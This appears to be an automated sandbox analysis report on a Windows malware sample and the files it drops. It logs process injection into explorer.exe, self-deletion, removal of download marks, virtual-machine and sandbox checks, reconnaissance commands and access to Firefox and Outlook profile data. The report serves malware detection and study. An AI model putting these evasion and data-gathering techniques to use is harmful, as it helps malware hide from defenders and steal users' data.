Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe	Section loaded: profapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ipconfig.exe	Section loaded: dnsapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\ROUTE.EXE	Section loaded: dnsapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: ifmon.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mprapi.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasmontr.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasapi32.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: rasman.dll
Source: C:\Windows\System32\netsh.exe	Section loaded: mfc42u.dll

Source: C:\Windows\explorer.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\systeminfo.exe systeminfo

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\tasklist.exe tasklist /v /fo csv

Source: C:\Windows\SysWOW64\explorer.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Source: C:\Users\user\Desktop\9VgIkx4su0.exe

File opened: C:\Windows\SysWOW64\msvcr100.dll

Jump to behavior

Source: 9VgIkx4su0.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Unpacked PE file: 0.2.9VgIkx4su0.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\eihchav	Unpacked PE file: 4.2.eihchav.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Unpacked PE file: 6.2.3E40.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Roaming\dghchav	Unpacked PE file: 7.2.dghchav.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe

Code function: 8_2_00007FF6DFE278EC LoadLibraryA,GetProcAddress,GetCurrentProcess,IsWow64Process,

8_2_00007FF6DFE278EC

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_004014D9 pushad ; ret	0_2_004014E9
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_004031DB push eax; ret	0_2_004032AB
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_0062515F push esp; ret	0_2_00625161
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00623502 push B63524ADh; retn 001Fh	0_2_00623539
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_00623FFF pushfd ; iretd	0_2_00624000
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Code function: 0_2_02091540 pushad ; ret	0_2_02091550
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_004014D9 pushad ; ret	4_2_004014E9
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_004031DB push eax; ret	4_2_004032AB
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_005E183A push B63524ADh; retn 001Fh	4_2_005E1871
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_005E2337 pushfd ; iretd	4_2_005E2338
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_005E3497 push esp; ret	4_2_005E3499
Source: C:\Users\user\AppData\Roaming\eihchav	Code function: 4_2_02091540 pushad ; ret	4_2_02091550
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_0040100B push esi; ret	6_2_0040100C
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_0040280E push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_0040281F push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00402822 push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00401328 push edi; retf	6_2_0040132A
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004027ED push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_004027FB push esp; ret	6_2_004029C6
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00562854 push esp; ret	6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00562875 push esp; ret	6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00561072 push esi; ret	6_2_00561073
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00562862 push esp; ret	6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00561909 push esp; iretd	6_2_005619BF
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00561386 push edi; retf	6_2_00561391
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00562886 push esp; ret	6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_00562889 push esp; ret	6_2_00562A2D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_006C0545 push esi; ret	6_2_006C0546
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_006C085C push edi; retf	6_2_006C085D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_006AD83E push eax; retf 006Ah	6_2_006AD81D
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Code function: 6_2_006C1FCA push 9A832F1Fh; iretd	6_2_006C1FD0

Persistence and Installation Behavior

Uses ipconfig to lookup or modify the Windows network settings

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\ipconfig.exe ipconfig /displaydns

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\dghchav	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\FDDB.exe	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\eihchav	Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Local\Temp\3E40.exe	Jump to dropped file

Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\dghchav			Jump to dropped file
Source: C:\Windows\explorer.exe	File created: C:\Users\user\AppData\Roaming\eihchav			Jump to dropped file

Hooking and other Techniques for Hiding and Protection

Deletes itself after installation

Source: C:\Windows\explorer.exe

File deleted: c:\users\user\desktop\9vgikx4su0.exe

Jump to behavior

Hides that the sample has been downloaded from the Internet (zone.identifier)

Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\eihchav:Zone.Identifier read attributes \| delete			Jump to behavior
Source: C:\Windows\explorer.exe	File opened: C:\Users\user\AppData\Roaming\dghchav:Zone.Identifier read attributes \| delete			Jump to behavior

Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\explorer.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\conhost.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\wbem\WMIC.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\netsh.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\systeminfo.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\tasklist.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Checks if the current machine is a virtual machine (disk enumeration)

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\eihchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior
Source: C:\Users\user\AppData\Roaming\dghchav	Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI	Jump to behavior

Found evasive API chain (may stop execution after checking mutex)

Source: C:\Windows\SysWOW64\explorer.exe

Evasive API call chain: CreateMutex,DecisionNodes,Sleep

graph_15-892

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\3E40.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, PNPDeviceID, Manufacturer, Description FROM Win32_PnPEntity WHERE ClassGuid="{50dd5230-ba8a-11d1-bf5d-0000f805f530}"

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, MACAddress, ProductName, ServiceName, NetConnectionID FROM Win32_NetworkAdapter WHERE PhysicalAdapter=TRUE
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapter

Queries sensitive service information (via WMI, Win32_StartupCommand, often done to detect sandboxes)

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_StartupCommand
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, Location, Command FROM Win32_StartupCommand

Switches to a custom stack to bypass stack traces

Source: C:\Users\user\Desktop\9VgIkx4su0.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\Desktop\9VgIkx4su0.exe	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\eihchav	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\eihchav	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Local\Temp\3E40.exe	API/Special instruction interceptor: Address: 7FF8C88ED584
Source: C:\Users\user\AppData\Roaming\dghchav	API/Special instruction interceptor: Address: 7FF8C88EE814
Source: C:\Users\user\AppData\Roaming\dghchav	API/Special instruction interceptor: Address: 7FF8C88ED584

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Source: 9VgIkx4su0.exe, 00000000.00000002.2114577887.00000000005FE000.00000004.00000020.00020000.00000000.sdmp

Binary or memory string: ASWHOOK

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 15_2_00191016 RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection,GetCurrentProcessId,lstrcmpiA,CreateToolhelp32Snapshot,Process32First,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,lstrcmpiA,Process32Next,CloseHandle,Sleep,

15_2_00191016

Source: C:\Users\user\AppData\Local\Temp\3E40.exe

Code function: 6_2_006AD884 sldt word ptr [eax]

6_2_006AD884

Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 455	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2583	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 798	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 595	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 888	Jump to behavior
Source: C:\Windows\explorer.exe	Window / User API: foregroundWindowGot 858	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 2812
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 2054
Source: C:\Windows\SysWOW64\explorer.exe	Window / User API: threadDelayed 4097
Source: C:\Windows\explorer.exe	Window / User API: threadDelayed 4227

Source: C:\Users\user\AppData\Roaming\dghchav	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep
Source: C:\Users\user\AppData\Roaming\eihchav	Evasive API call chain: GetModuleFileName,DecisionNodes,Sleep

Source: C:\Windows\SysWOW64\explorer.exe	API coverage: 9.8 %
Source: C:\Users\user\AppData\Roaming\dghchav	API coverage: 6.8 %
Source: C:\Users\user\AppData\Roaming\eihchav	API coverage: 6.8 %

Source: C:\Windows\explorer.exe TID: 6532	Thread sleep count: 455 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 984	Thread sleep count: 2583 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 984	Thread sleep time: -258300s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4760	Thread sleep count: 798 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 4760	Thread sleep time: -79800s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 2300	Thread sleep count: 303 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1216	Thread sleep count: 325 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 1216	Thread sleep time: -32500s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3116	Thread sleep count: 331 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 3116	Thread sleep time: -33100s >= -30000s	Jump to behavior
Source: C:\Windows\explorer.exe TID: 984	Thread sleep count: 595 > 30	Jump to behavior
Source: C:\Windows\explorer.exe TID: 984	Thread sleep time: -59500s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe TID: 3440	Thread sleep count: 2812 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 3440	Thread sleep time: -2812000s >= -30000s
Source: C:\Windows\explorer.exe TID: 4568	Thread sleep count: 2054 > 30
Source: C:\Windows\explorer.exe TID: 4568	Thread sleep time: -2054000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 6056	Thread sleep count: 4097 > 30
Source: C:\Windows\SysWOW64\explorer.exe TID: 6056	Thread sleep time: -4097000s >= -30000s
Source: C:\Windows\explorer.exe TID: 5980	Thread sleep count: 4227 > 30
Source: C:\Windows\explorer.exe TID: 5980	Thread sleep time: -4227000s >= -30000s

Source: C:\Windows\System32\systeminfo.exe

WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BIOS

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_ComputerSystem
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Caption, Manufacturer, PrimaryOwnerName, UserName, Workgroup FROM Win32_ComputerSystem

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_Processor
Source: C:\Windows\System32\wbem\WMIC.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT Name, DeviceID, NumberOfCores FROM Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\System32\systeminfo.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed
Source: C:\Windows\explorer.exe	Last function: Thread delayed

Source: C:\Users\user\AppData\Local\Temp\FDDB.exe	Code function: 8_2_00007FF6DFE2FB4C GetEnvironmentVariableW,lstrcatW,lstrcpyW,lstrcatW,FindFirstFileW,lstrcatW,lstrcatW,FindClose,	8_2_00007FF6DFE2FB4C
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E2B15 FindFirstFileW,lstrcmpiW,lstrcmpiW,StrStrIW,StrStrIW,FindNextFileW,FindClose,	10_2_006E2B15
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E1D4A FindFirstFileW,lstrcmpiW,lstrcmpiW,lstrcmpiW,FindNextFileW,FindClose,	10_2_006E1D4A
Source: C:\Windows\SysWOW64\explorer.exe	Code function: 10_2_006E3ED9 PathCombineW,FindFirstFileW,lstrcmpiW,lstrcmpiW,PathCombineW,lstrcmpiW,PathCombineW,FindNextFileW,FindClose,	10_2_006E3ED9
Source: C:\Windows\explorer.exe	Code function: 13_2_00CB30A8 FindFirstFileW,FindNextFileW,FindClose,	13_2_00CB30A8

Source: C:\Users\user\AppData\Roaming\dghchav

38_2_004010E0

Source: C:\Windows\SysWOW64\explorer.exe

Code function: 10_2_006E6512 GetSystemInfo,

10_2_006E6512

Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\2823318777ntouromlalnodry--naod.files\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\	Jump to behavior
Source: C:\Windows\SysWOW64\explorer.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\storage\permanent\chrome\idb\1657114595AmcateirvtiSty.files\	Jump to behavior
